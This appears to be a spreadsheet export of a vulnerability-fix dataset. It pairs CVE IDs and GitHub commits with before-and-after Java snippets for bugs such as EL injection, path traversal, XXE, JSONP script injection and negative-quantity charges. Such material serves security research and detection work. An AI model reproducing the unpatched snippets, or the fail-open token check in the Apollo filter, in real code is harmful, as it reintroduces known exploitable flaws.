    <t>CVE-2020-11002</t>
  </si>
  <si>
    <t>https://github.com/dropwizard/dropwizard/commit/d5a512f7abf965275f2a6b913ac4fe778e424242</t>
  </si>
  <si>
    <t>InterpolationHelper.java</t>
  </si>
  <si>
    <t>d5a512f7abf965275f2a6b913ac4fe778e424242</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * Hibernate Validator, declare and validate application constraints
 *
 * License: Apache License, Version 2.0
 * See the license.txt file in the root directory or &lt;http://www.apache.org/licenses/LICENSE-2.0&gt;.
 */
package io.dropwizard.validation;
import javax.annotation.Nullable;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
 * Utilities used for message interpolation.
 *
 * @author Guillaume Smet
 * @since 2.0.3
 */
public final class InterpolationHelper {
    public static final char BEGIN_TERM = '{';
    public static final char END_TERM = '}';
    public static final char EL_DESIGNATOR = '$';
    public static final char ESCAPE_CHARACTER = '\\';
    private static final Pattern ESCAPE_MESSAGE_PARAMETER_PATTERN = Pattern.compile("([\\" + ESCAPE_CHARACTER + BEGIN_TERM + END_TERM + EL_DESIGNATOR + "])");
    private InterpolationHelper() {
    }
    @Nullable
    public static String escapeMessageParameter(@Nullable String messageParameter) {
        if (messageParameter == null) {
            return null;
        }
        return ESCAPE_MESSAGE_PARAMETER_PATTERN.matcher(messageParameter).replaceAll(Matcher.quoteReplacement(String.valueOf(ESCAPE_CHARACTER)) + "$1");
    }
}
</t>
  </si>
  <si>
    <t>Disable message interpolation in ConstraintViolations by default (#3208)Disable message interpolation in ConstraintViolations by default but allow enabling it explicitly with `SelfValidating#escapeExpressions()`.
Additionally, `ConstraintViolations` now provides a set of methods which take a map of message parameters for interpolation.
The message parameters will be escaped by default.
Refs #3153
Refs #3157</t>
  </si>
  <si>
    <t>SelfValidating.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.Map;
    /**
     * Escape EL expressions to avoid template injection attacks.
     * &lt;p&gt;
     * This has serious security implications and you will
     * have to escape the violation messages added to {@link ViolationCollector} appropriately.
     *
     * @see ViolationCollector#addViolation(String, Map)
     * @see ViolationCollector#addViolation(String, String, Map)
     * @see ViolationCollector#addViolation(String, Integer, String, Map)
     */
    boolean escapeExpressions() default true;
</t>
  </si>
  <si>
    <t>SelfValidatingValidator.java</t>
  </si>
  <si>
    <t xml:space="preserve">        final ViolationCollector collector = new ViolationCollector(context);
</t>
  </si>
  <si>
    <t xml:space="preserve">    private boolean escapeExpressions = true;
        escapeExpressions = constraintAnnotation.escapeExpressions();
        final ViolationCollector collector = new ViolationCollector(context, escapeExpressions);
</t>
  </si>
  <si>
    <t>ViolationCollector.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.regex.Matcher;
import java.util.regex.Pattern;
    private static final Pattern ESCAPE_PATTERN = Pattern.compile("\\$\\{");
    private ConstraintValidatorContext context;
    public ViolationCollector(ConstraintValidatorContext context) {
        this.context = context;
     * @param message the message of the violation (any EL expression will be escaped and not parsed)
        String messageTemplate = escapeEl(message);
        context.buildConstraintViolationWithTemplate(messageTemplate)
     * @param message      the message of the violation (any EL expression will be escaped and not parsed)
        String messageTemplate = escapeEl(message);
        context.buildConstraintViolationWithTemplate(messageTemplate)
        String messageTemplate = escapeEl(message);
        context.buildConstraintViolationWithTemplate(messageTemplate)
     * @param message      the message of the violation (any EL expression will be escaped and not parsed)
        String messageTemplate = escapeEl(message);
    @Nullable
    private String escapeEl(@Nullable String s) {
        if (s == null || s.isEmpty()) {
            return s;
        }
        final Matcher m = ESCAPE_PATTERN.matcher(s);
        final StringBuffer sb = new StringBuffer(s.length() + 16);
        while (m.find()) {
            m.appendReplacement(sb, "\\\\\\${");
        m.appendTail(sb);
        return sb.toString();
        return context;
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.hibernate.validator.constraintvalidation.HibernateConstraintValidatorContext;
import java.util.Collections;
import java.util.Map;
import static io.dropwizard.validation.InterpolationHelper.escapeMessageParameter;
    private final ConstraintValidatorContext constraintValidatorContext;
    private final boolean escapeExpressions;
    public ViolationCollector(ConstraintValidatorContext constraintValidatorContext) {
        this(constraintValidatorContext, true);
    }
    public ViolationCollector(ConstraintValidatorContext constraintValidatorContext, boolean escapeExpressions) {
        this.constraintValidatorContext = constraintValidatorContext;
        this.escapeExpressions = escapeExpressions;
     * &lt;p&gt;
     * Prefer the method with explicit message parameters if you want to interpolate the message.
     * @param message the message of the violation
     * @see #addViolation(String, Map)
        addViolation(message, Collections.emptyMap());
    }
    /**
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     *
     * @param message           the message of the violation
     * @param messageParameters a map of message parameters which can be interpolated in the violation message
     * @since 2.0.3
     */
    public void addViolation(String message, Map&lt;String, Object&gt; messageParameters) {
        getContextWithMessageParameters(messageParameters)
                .buildConstraintViolationWithTemplate(sanitizeTemplate(message))
     * &lt;p&gt;
     * Prefer the method with explicit message parameters if you want to interpolate the message.
     * @param message      the message of the violation
     * @see #addViolation(String, String, Map)
        addViolation(propertyName, message, Collections.emptyMap());
    }
    /**
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     *
     * @param propertyName      the name of the property
     * @param message           the message of the violation
     * @param messageParameters a map of message parameters which can be interpolated in the violation message
     * @since 2.0.3
     */
    public void addViolation(String propertyName, String message, Map&lt;String, Object&gt; messageParameters) {
        getContextWithMessageParameters(messageParameters)
                .buildConstraintViolationWithTemplate(sanitizeTemplate(message))
     * Prefer the method with explicit message parameters if you want to interpolate the message.
     * @see ViolationCollector#addViolation(String, Integer, String, Map)
        addViolation(propertyName, index, message, Collections.emptyMap());
    }
    /**
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     *
     * @param propertyName      the name of the property with the violation
     * @param index             the index of the element with the violation
     * @param message           the message of the violation
     * @param messageParameters a map of message parameters which can be interpolated in the violation message
     * @since 2.0.3
     */
    public void addViolation(String propertyName, Integer index, String message, Map&lt;String, Object&gt; messageParameters) {
        getContextWithMessageParameters(messageParameters)
                .buildConstraintViolationWithTemplate(sanitizeTemplate(message))
     * @param message      the message of the violation
        addViolation(propertyName, key, message, Collections.emptyMap());
    }
    /**
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     *
     * @param propertyName      the name of the property with the violation
     * @param key               the key of the element with the violation
     * @param message           the message of the violation
     * @param messageParameters a map of message parameters which can be interpolated in the violation message
     * @since 2.0.3
     */
    public void addViolation(String propertyName, String key, String message, Map&lt;String, Object&gt; messageParameters) {
        final String messageTemplate = sanitizeTemplate(message);
        final HibernateConstraintValidatorContext context = getContextWithMessageParameters(messageParameters);
    private HibernateConstraintValidatorContext getContextWithMessageParameters(Map&lt;String, Object&gt; messageParameters) {
        final HibernateConstraintValidatorContext context =
                constraintValidatorContext.unwrap(HibernateConstraintValidatorContext.class);
        for (Map.Entry&lt;String, Object&gt; messageParameter : messageParameters.entrySet()) {
            final Object value = messageParameter.getValue();
            final String escapedValue = value == null ? null : escapeMessageParameter(value.toString());
            context.addMessageParameter(messageParameter.getKey(), escapedValue);
        return context;
    }
    @Nullable
    private String sanitizeTemplate(@Nullable String message) {
        return escapeExpressions ? escapeMessageParameter(message) : message;
        return constraintValidatorContext;
</t>
  </si>
  <si>
    <t>CVE-2020-11006</t>
  </si>
  <si>
    <t>https://github.com/shopizer-ecommerce/shopizer/commit/929ca0839a80c6f4dad087e0259089908787ad2a</t>
  </si>
  <si>
    <t>ShoppingCartFacadeImpl.java</t>
  </si>
  <si>
    <t>929ca0839a80c6f4dad087e0259089908787ad2a</t>
  </si>
  <si>
    <t xml:space="preserve">        	if(availability.getProductQuantity() == null || availability.getProductQuantity().intValue() ==0) {
        	if(availability.getProductQuantity() == null || availability.getProductQuantity().intValue() ==0) {
    @SuppressWarnings("unchecked")
	@Override
	@SuppressWarnings("unchecked")
</t>
  </si>
  <si>
    <t xml:space="preserve">        if(item.getQuantity() &lt; 1) item.setQuantity(1);
        	if(availability.getProductQuantity() == null || availability.getProductQuantity().intValue() &lt;= 0) {
        	if(availability.getProductQuantity() == null || availability.getProductQuantity().intValue() &lt;= 0) {
    @Override
		if(item.getQuantity() &lt; 1) item.setQuantity(1);
</t>
  </si>
  <si>
    <t>Merge pull request from GHSA-w8rc-pgxq-x2cjFixing negative charge vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-12443</t>
  </si>
  <si>
    <t>https://github.com/bigbluebutton/bigbluebutton/commit/b21ca8355a57286a1e6df96984b3a4c57679a463</t>
  </si>
  <si>
    <t>RecordingService.java</t>
  </si>
  <si>
    <t>b21ca8355a57286a1e6df96984b3a4c57679a463</t>
  </si>
  <si>
    <t xml:space="preserve">    	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);
        return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
</t>
  </si>
  <si>
    <t xml:space="preserve">        log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId,
                presFilename);
        // Build file to presFilename
        // Get canonicalPath and make sure it starts with
        // /var/bigbluebutton/&lt;meetingid-pattern&gt;
        // If so return file, if not return null
        File presFile = new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
        try {
            String presFileCanonical = presFile.getCanonicalPath();
            log.debug("Requested presentation name file full path {}",presFileCanonical);
            if (presFileCanonical.startsWith(presentationBaseDir)) {
                return presFile;
            }
        } catch (IOException e) {
            log.error("Exception getting canonical path for {}.\n{}", presFilename, e);
            return null;
        }
        log.error("Cannot find file for {}.", presFilename);
        return null;
</t>
  </si>
  <si>
    <t>Return 404 error when the file download is not allowed.</t>
  </si>
  <si>
    <t>CVE-2020-13692</t>
  </si>
  <si>
    <t>https://github.com/pgjdbc/pgjdbc/commit/14b62aca4764d496813f55a43d050b017e01eb65</t>
  </si>
  <si>
    <t>PGProperty.java</t>
  </si>
  <si>
    <t>14b62aca4764d496813f55a43d050b017e01eb65</t>
  </si>
  <si>
    <t xml:space="preserve">  /**
   * Factory class to instantiate factories for XML processing.
   * The default factory disables external entity processing.
   * Legacy behavior with external entity processing can be enabled by specifying a value of LEGACY_INSECURE.
   * Or specify a custom class that implements {@code org.postgresql.xml.PGXmlFactoryFactory}.
   */
  XML_FACTORY_FACTORY(
    "xmlFactoryFactory",
    "",
    "Factory class to instantiate factories for XML processing"),
</t>
  </si>
  <si>
    <t>Merge pull request from GHSA-37xm-4h3m-5w3v* refactor: Clean up whitespace in existing PgSQLXMLTest
* fix: Fix XXE vulnerability in PgSQLXML by disabling external access and doctypes
Fixes XXE vulnerability by defaulting to disabling external access and doc types. The
legacy insecure behavior can be restored via the new connection property xmlFactoryFactory
with a value of LEGACY_INSECURE. Alternatively, a custom class name can be specified that
implements org.postgresql.xml.PGXmlFactoryFactory and takes a no argument constructor.
* fix: Add missing getter and setter for XML_FACTORY_FACTORY to BasicDataSource</t>
  </si>
  <si>
    <t>BaseConnection.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.postgresql.xml.PGXmlFactoryFactory;
  /**
   * Retrieve the factory to instantiate XML processing factories.
   *
   * @return The factory to use to instantiate XML processing factories
   * @throws SQLException if the class cannot be found or instantiated.
   */
  PGXmlFactoryFactory getXmlFactoryFactory() throws SQLException;
</t>
  </si>
  <si>
    <t>BaseDataSource.java</t>
  </si>
  <si>
    <t xml:space="preserve">  public String getXmlFactoryFactory() {
    return PGProperty.XML_FACTORY_FACTORY.get(properties);
  }
  public void setXmlFactoryFactory(String xmlFactoryFactory) {
    PGProperty.XML_FACTORY_FACTORY.set(properties, xmlFactoryFactory);
  }
</t>
  </si>
  <si>
    <t>PgConnection.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.postgresql.xml.DefaultPGXmlFactoryFactory;
import org.postgresql.xml.LegacyInsecurePGXmlFactoryFactory;
import org.postgresql.xml.PGXmlFactoryFactory;
  private final String xmlFactoryFactoryClass;
  private PGXmlFactoryFactory xmlFactoryFactory;
    xmlFactoryFactoryClass = PGProperty.XML_FACTORY_FACTORY.get(info);
  @Override
  public PGXmlFactoryFactory getXmlFactoryFactory() throws SQLException {
    if (xmlFactoryFactory == null) {
      if (xmlFactoryFactoryClass == null || xmlFactoryFactoryClass.equals("")) {
        xmlFactoryFactory = DefaultPGXmlFactoryFactory.INSTANCE;
      } else if (xmlFactoryFactoryClass.equals("LEGACY_INSECURE")) {
        xmlFactoryFactory = LegacyInsecurePGXmlFactoryFactory.INSTANCE;
      } else {
        Class&lt;?&gt; clazz;
        try {
          clazz = Class.forName(xmlFactoryFactoryClass);
        } catch (ClassNotFoundException ex) {
          throw new PSQLException(
              GT.tr("Could not instantiate xmlFactoryFactory: {0}", xmlFactoryFactoryClass),
              PSQLState.INVALID_PARAMETER_VALUE, ex);
        }
        if (!clazz.isAssignableFrom(PGXmlFactoryFactory.class)) {
          throw new PSQLException(
              GT.tr("Connection property xmlFactoryFactory must implement PGXmlFactoryFactory: {0}", xmlFactoryFactoryClass),
              PSQLState.INVALID_PARAMETER_VALUE);
        }
        try {
          xmlFactoryFactory = (PGXmlFactoryFactory) clazz.newInstance();
        } catch (Exception ex) {
          throw new PSQLException(
              GT.tr("Could not instantiate xmlFactoryFactory: {0}", xmlFactoryFactoryClass),
              PSQLState.INVALID_PARAMETER_VALUE, ex);
        }
      }
    }
    return xmlFactoryFactory;
  }
</t>
  </si>
  <si>
    <t>DefaultPGXmlFactoryFactory.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * Copyright (c) 2020, PostgreSQL Global Development Group
 * See the LICENSE file in the project root for more information.
 */
package org.postgresql.xml;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.XMLReaderFactory;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLOutputFactory;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.sax.SAXTransformerFactory;
/**
 * Default implementation of PGXmlFactoryFactory that configures each factory per OWASP recommendations.
 *
 * @see &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"&gt;https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html&lt;/a&gt;
 */
public class DefaultPGXmlFactoryFactory implements PGXmlFactoryFactory {
  public static final DefaultPGXmlFactoryFactory INSTANCE = new DefaultPGXmlFactoryFactory();
  private DefaultPGXmlFactoryFactory() {
  }
  private DocumentBuilderFactory getDocumentBuilderFactory() {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    setFactoryProperties(factory);
    factory.setXIncludeAware(false);
    factory.setExpandEntityReferences(false);
    return factory;
  }
  @Override
  public DocumentBuilder newDocumentBuilder() throws ParserConfigurationException {
    DocumentBuilder builder = getDocumentBuilderFactory().newDocumentBuilder();
    builder.setEntityResolver(EmptyStringEntityResolver.INSTANCE);
    builder.setErrorHandler(NullErrorHandler.INSTANCE);
    return builder;
  }
  @Override
  public TransformerFactory newTransformerFactory() {
    TransformerFactory factory = TransformerFactory.newInstance();
    setFactoryProperties(factory);
    return factory;
  }
  @Override
  public SAXTransformerFactory newSAXTransformerFactory() {
    SAXTransformerFactory factory = (SAXTransformerFactory) SAXTransformerFactory.newInstance();
    setFactoryProperties(factory);
    return factory;
  }
  @Override
  public XMLInputFactory newXMLInputFactory() {
    XMLInputFactory factory = XMLInputFactory.newInstance();
    setPropertyQuietly(factory, XMLInputFactory.SUPPORT_DTD, false);
    setPropertyQuietly(factory, XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
    return factory;
  }
  @Override
  public XMLOutputFactory newXMLOutputFactory() {
    XMLOutputFactory factory = XMLOutputFactory.newInstance();
    return factory;
  }
  @Override
  public XMLReader createXMLReader() throws SAXException {
    XMLReader factory = XMLReaderFactory.createXMLReader();
    setFeatureQuietly(factory, "http://apache.org/xml/features/disallow-doctype-decl", true);
    setFeatureQuietly(factory, "http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    setFeatureQuietly(factory, "http://xml.org/sax/features/external-general-entities", false);
    setFeatureQuietly(factory, "http://xml.org/sax/features/external-parameter-entities", false);
    factory.setErrorHandler(NullErrorHandler.INSTANCE);
    return factory;
  }
  private static void setFeatureQuietly(Object factory, String name, boolean value) {
    try {
      if (factory instanceof DocumentBuilderFactory) {
        ((DocumentBuilderFactory) factory).setFeature(name, value);
      } else if (factory instanceof TransformerFactory) {
        ((TransformerFactory) factory).setFeature(name, value);
      } else if (factory instanceof XMLReader) {
        ((XMLReader) factory).setFeature(name, value);
      } else {
        throw new Error("Invalid factory class: " + factory.getClass());
      }
      return;
    } catch (Exception ignore) {
    }
  }
  private static void setAttributeQuietly(Object factory, String name, Object value) {
    try {
      if (factory instanceof DocumentBuilderFactory) {
        ((DocumentBuilderFactory) factory).setAttribute(name, value);
      } else if (factory instanceof TransformerFactory) {
        ((TransformerFactory) factory).setAttribute(name, value);
      } else {
        throw new Error("Invalid factory class: " + factory.getClass());
      }
    } catch (Exception ignore) {
    }
  }
  private static void setFactoryProperties(Object factory) {
    setFeatureQuietly(factory, XMLConstants.FEATURE_SECURE_PROCESSING, true);
    setFeatureQuietly(factory, "http://apache.org/xml/features/disallow-doctype-decl", true);
    setFeatureQuietly(factory, "http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    setFeatureQuietly(factory, "http://xml.org/sax/features/external-general-entities", false);
    setFeatureQuietly(factory, "http://xml.org/sax/features/external-parameter-entities", false);
    // Values from XMLConstants inlined for JDK 1.6 compatibility
    setAttributeQuietly(factory, "http://javax.xml.XMLConstants/property/accessExternalDTD", "");
    setAttributeQuietly(factory, "http://javax.xml.XMLConstants/property/accessExternalSchema", "");
    setAttributeQuietly(factory, "http://javax.xml.XMLConstants/property/accessExternalStylesheet", "");
  }
  private static void setPropertyQuietly(Object factory, String name, Object value) {
    try {
      if (factory instanceof XMLReader) {
        ((XMLReader) factory).setProperty(name, value);
      } else if (factory instanceof XMLInputFactory) {
        ((XMLInputFactory) factory).setProperty(name, value);
      } else {
        throw new Error("Invalid factory class: " + factory.getClass());
      }
    } catch (Exception ignore) {
    }
  }
}
</t>
  </si>
  <si>
    <t>EmptyStringEntityResolver.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * Copyright (c) 2020, PostgreSQL Global Development Group
 * See the LICENSE file in the project root for more information.
 */
package org.postgresql.xml;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import java.io.IOException;
import java.io.StringReader;
public class EmptyStringEntityResolver implements EntityResolver {
  public static final EmptyStringEntityResolver INSTANCE = new EmptyStringEntityResolver();
  @Override
  public InputSource resolveEntity(String publicId, String systemId)
      throws SAXException, IOException {
    return new InputSource(new StringReader(""));
  }
}
</t>
  </si>
  <si>
    <t>CVE-2020-15124</t>
  </si>
  <si>
    <t>https://github.com/intranda/goobi-viewer-core/commit/44ceb8e2e7e888391e8a941127171d6366770df3</t>
  </si>
  <si>
    <t>DataFileTools.java</t>
  </si>
  <si>
    <t>44ceb8e2e7e888391e8a941127171d6366770df3</t>
  </si>
  <si>
    <t xml:space="preserve">        //make sure fileName is a pure filename and not a path
        fileName = Paths.get(fileName).getFileName().toString();
</t>
  </si>
  <si>
    <t>Don't allow filepaths as Filename when requesting source files</t>
  </si>
  <si>
    <t>CVE-2020-15170</t>
  </si>
  <si>
    <t>https://github.com/ctripcorp/apollo/commit/ae9ba6cfd32ed80469f162e5e3583e2477862ddf</t>
  </si>
  <si>
    <t>AdminServiceAutoConfiguration.java</t>
  </si>
  <si>
    <t>ae9ba6cfd32ed80469f162e5e3583e2477862ddf</t>
  </si>
  <si>
    <t xml:space="preserve">package com.ctrip.framework.apollo.adminservice;
import com.ctrip.framework.apollo.adminservice.filter.AdminServiceAuthenticationFilter;
import com.ctrip.framework.apollo.biz.config.BizConfig;
import org.springframework.boot.web.servlet.FilterRegistrationBean;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
@Configuration
public class AdminServiceAutoConfiguration {
  private final BizConfig bizConfig;
  public AdminServiceAutoConfiguration(final BizConfig bizConfig) {
    this.bizConfig = bizConfig;
  }
  @Bean
  public FilterRegistrationBean&lt;AdminServiceAuthenticationFilter&gt; adminServiceAuthenticationFilter() {
    FilterRegistrationBean&lt;AdminServiceAuthenticationFilter&gt; filterRegistrationBean = new FilterRegistrationBean&lt;&gt;();
    filterRegistrationBean.setFilter(new AdminServiceAuthenticationFilter(bizConfig));
    filterRegistrationBean.addUrlPatterns("/apps/*");
    filterRegistrationBean.addUrlPatterns("/appnamespaces/*");
    filterRegistrationBean.addUrlPatterns("/instances/*");
    filterRegistrationBean.addUrlPatterns("/items/*");
    filterRegistrationBean.addUrlPatterns("/namespaces/*");
    filterRegistrationBean.addUrlPatterns("/releases/*");
    return filterRegistrationBean;
  }
}
</t>
  </si>
  <si>
    <t>add access control support for admin service</t>
  </si>
  <si>
    <t>AdminServiceAuthenticationFilter.java</t>
  </si>
  <si>
    <t xml:space="preserve">package com.ctrip.framework.apollo.adminservice.filter;
import com.ctrip.framework.apollo.biz.config.BizConfig;
import com.google.common.base.Splitter;
import com.google.common.base.Strings;
import java.io.IOException;
import java.util.List;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.http.HttpHeaders;
public class AdminServiceAuthenticationFilter implements Filter {
  private static final Logger logger = LoggerFactory
      .getLogger(AdminServiceAuthenticationFilter.class);
  private static final Splitter ACCESS_TOKEN_SPLITTER = Splitter.on(",").omitEmptyStrings()
      .trimResults();
  private final BizConfig bizConfig;
  private volatile String lastAccessTokens;
  private volatile List&lt;String&gt; accessTokenList;
  public AdminServiceAuthenticationFilter(BizConfig bizConfig) {
    this.bizConfig = bizConfig;
  }
  @Override
  public void init(FilterConfig filterConfig) throws ServletException {
  }
  @Override
  public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
      throws IOException, ServletException {
    if (bizConfig.isAdminServiceAccessControlEnabled()) {
      HttpServletRequest request = (HttpServletRequest) req;
      HttpServletResponse response = (HttpServletResponse) resp;
      String token = request.getHeader(HttpHeaders.AUTHORIZATION);
      if (!checkAccessToken(token)) {
        logger.warn("Invalid access token: {} for uri: {}", token, request.getRequestURI());
        response.sendError(HttpServletResponse.SC_UNAUTHORIZED, "Unauthorized");
        return;
      }
    }
    chain.doFilter(req, resp);
  }
  private boolean checkAccessToken(String token) {
    String accessTokens = bizConfig.getAdminServiceAccessTokens();
    // if user forget to configure access tokens, then default to pass
    if (Strings.isNullOrEmpty(accessTokens)) {
      return true;
    }
    // no need to check
    if (Strings.isNullOrEmpty(token)) {
      return false;
    }
    // update cache
    if (!accessTokens.equals(lastAccessTokens)) {
      synchronized (this) {
        accessTokenList = ACCESS_TOKEN_SPLITTER.splitToList(accessTokens);
        lastAccessTokens = accessTokens;
      }
    }
    return accessTokenList.contains(token);
  }
  @Override
  public void destroy() {
  }
}
</t>
  </si>
  <si>
    <t>CVE-2020-15231</t>
  </si>
  <si>
    <t>https://github.com/mapfish/mapfish-print/commit/89155f2506b9cee822e15ce60ccae390a1419d5e</t>
  </si>
  <si>
    <t>MapPrinterServlet.java</t>
  </si>
  <si>
    <t>89155f2506b9cee822e15ce60ccae390a1419d5e</t>
  </si>
  <si>
    <t xml:space="preserve">     * Part of the {@link #getStatus(String, String, javax.servlet.http.HttpServletRequest,
     * Part of the {@link #getStatus(String, String, javax.servlet.http.HttpServletRequest,
     * Part of the {@link #getStatus(String, String, javax.servlet.http.HttpServletRequest,
     * Part of the {@link #getStatus(String, String, javax.servlet.http.HttpServletRequest,
        return headerName.map(s -&gt; ref + "@" + request.getHeader(s).replaceAll("[^a-zA-Z0-9._:-]", "_")
     * @param jsonpCallback if given the result is returned with a function call wrapped around it
            @RequestParam(value = "jsonp", defaultValue = "") final String jsonpCallback,
        getStatus(referenceId, jsonpCallback, statusRequest, statusResponse);
     * @param jsonpCallback if given the result is returned with a function call wrapped around it
            @RequestParam(value = "jsonp", defaultValue = "") final String jsonpCallback,
            setContentType(statusResponse, jsonpCallback);
                appendJsonpCallback(jsonpCallback, writer);
                appendJsonpCallbackEnd(jsonpCallback, writer);
     * @param jsonpCallback if given the result is returned with a function call wrapped around it
            @RequestParam(value = "jsonp", defaultValue = "") final String jsonpCallback,
        setContentType(listAppsResponse, jsonpCallback);
            appendJsonpCallback(jsonpCallback, writer);
            appendJsonpCallbackEnd(jsonpCallback, writer);
     * @param jsonpCallback if given the result is returned with a function call wrapped around it
            @RequestParam(value = "jsonp", defaultValue = "") final String jsonpCallback,
        getCapabilities(DEFAULT_CONFIGURATION_FILE_KEY, pretty, jsonpCallback, request, capabilitiesResponse);
     * @param jsonpCallback if given the result is returned with a function call wrapped around it
            @RequestParam(value = "jsonp", defaultValue = "") final String jsonpCallback,
        setContentType(capabilitiesResponse, jsonpCallback);
            if (!pretty &amp;&amp; !StringUtils.isEmpty(jsonpCallback)) {
                writer.append(jsonpCallback).append("(");
            }
            if (!pretty &amp;&amp; !StringUtils.isEmpty(jsonpCallback)) {
                writer.append(");");
            }
            if (!StringUtils.isEmpty(jsonpCallback)) {
                capabilitiesResponse.getOutputStream().print(jsonpCallback + "(");
            }
            if (!StringUtils.isEmpty(jsonpCallback)) {
                capabilitiesResponse.getOutputStream().print(");");
            }
     * @param jsonpCallback if given the result is returned with a function call wrapped around it
            @RequestParam(value = "jsonp", defaultValue = "") final String jsonpCallback,
        getExampleRequest(DEFAULT_CONFIGURATION_FILE_KEY, jsonpCallback, request, getExampleResponse);
     * @param jsonpCallback if given the result is returned with a function call wrapped around it
            @RequestParam(value = "jsonp", defaultValue = "") final String jsonpCallback,
                        setContentType(getExampleResponse, jsonpCallback);
                appendJsonpCallback(jsonpCallback, writer);
                appendJsonpCallbackEnd(jsonpCallback, writer);
    private void setContentType(
            final HttpServletResponse statusResponse,
            final String jsonpCallback) {
        if (StringUtils.isEmpty(jsonpCallback)) {
            statusResponse.setContentType("application/json; charset=utf-8");
        } else {
            statusResponse.setContentType("application/javascript; charset=utf-8");
        }
    }
    private void appendJsonpCallback(
            final String jsonpCallback,
            final PrintWriter writer) {
        if (!StringUtils.isEmpty(jsonpCallback)) {
            writer.append(jsonpCallback);
            writer.append("(");
        }
    private void appendJsonpCallbackEnd(
            final String jsonpCallback,
            final PrintWriter writer) {
        if (!StringUtils.isEmpty(jsonpCallback)) {
            writer.append(");");
        }
    }
</t>
  </si>
  <si>
    <t xml:space="preserve">     * Part of the {@link #getStatus(String, javax.servlet.http.HttpServletRequest,
     * Part of the {@link #getStatus(String, javax.servlet.http.HttpServletRequest,
     * Part of the {@link #getStatus(String, javax.servlet.http.HttpServletRequest,
     * Part of the {@link #getStatus(String, javax.servlet.http.HttpServletRequest,
        return headerName.map(
            s -&gt; ref + "@" + request.getHeader(s).replaceAll("[^a-zA-Z0-9._:-]", "_")
        getStatus(referenceId, statusRequest, statusResponse);
            setContentType(statusResponse);
        setContentType(listAppsResponse);
        getCapabilities(DEFAULT_CONFIGURATION_FILE_KEY, pretty, request, capabilitiesResponse);
        setContentType(capabilitiesResponse);
        getExampleRequest(DEFAULT_CONFIGURATION_FILE_KEY, request, getExampleResponse);
                        setContentType(getExampleResponse);
    private void setContentType(final HttpServletResponse statusResponse) {
        statusResponse.setContentType("application/json; charset=utf-8");
</t>
  </si>
  <si>
    <t>Remove JSONP supportSee: https://github.com/mapfish/mapfish-print/security/code-scanning/5?query=ref%3Arefs%2Fheads%2Fmaster</t>
  </si>
  <si>
    <t>CVE-2020-15232</t>
  </si>
  <si>
    <t>https://github.com/mapfish/mapfish-print/commit/e1d0527d13db06b2b62ca7d6afb9e97dacd67a0e</t>
  </si>
  <si>
    <t>SLDParserPlugin.java</t>
  </si>
  <si>
    <t>e1d0527d13db06b2b62ca7d6afb9e97dacd67a0e</t>
  </si>
  <si>
    <t xml:space="preserve">            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
</t>
  </si>
  <si>
    <t>See: https://github.com/mapfish/mapfish-print/security/code-scanning/……3?query=ref%3Arefs%2Fheads%2Fmaster</t>
  </si>
  <si>
    <t>CVE-2020-15250</t>
  </si>
  <si>
    <t>https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae</t>
  </si>
  <si>
    <t>TemporaryFolder.java</t>
  </si>
  <si>
    <t>610155b8c22138329f0723eec22521627dbc52ae</t>
  </si>
  <si>
    <t xml:space="preserve">    private File createTemporaryFolderIn(File parentFolder) throws IOException {
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.lang.reflect.Array;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
    private static File createTemporaryFolderIn(File parentFolder) throws IOException {
        try {
            return createTemporaryFolderWithNioApi(parentFolder);
        } catch (ClassNotFoundException ignore) {
            // Fallback for Java 5 and 6
            return createTemporaryFolderWithFileApi(parentFolder);
        } catch (InvocationTargetException e) {
            Throwable cause = e.getCause();
            if (cause instanceof IOException) {
                throw (IOException) cause;
            }
            if (cause instanceof RuntimeException) {
                throw (RuntimeException) cause;
            }
            IOException exception = new IOException("Failed to create temporary folder in " + parentFolder);
            exception.initCause(cause);
            throw exception;
        } catch (Exception e) {
            throw new RuntimeException("Failed to create temporary folder in " + parentFolder, e);
        }
    }
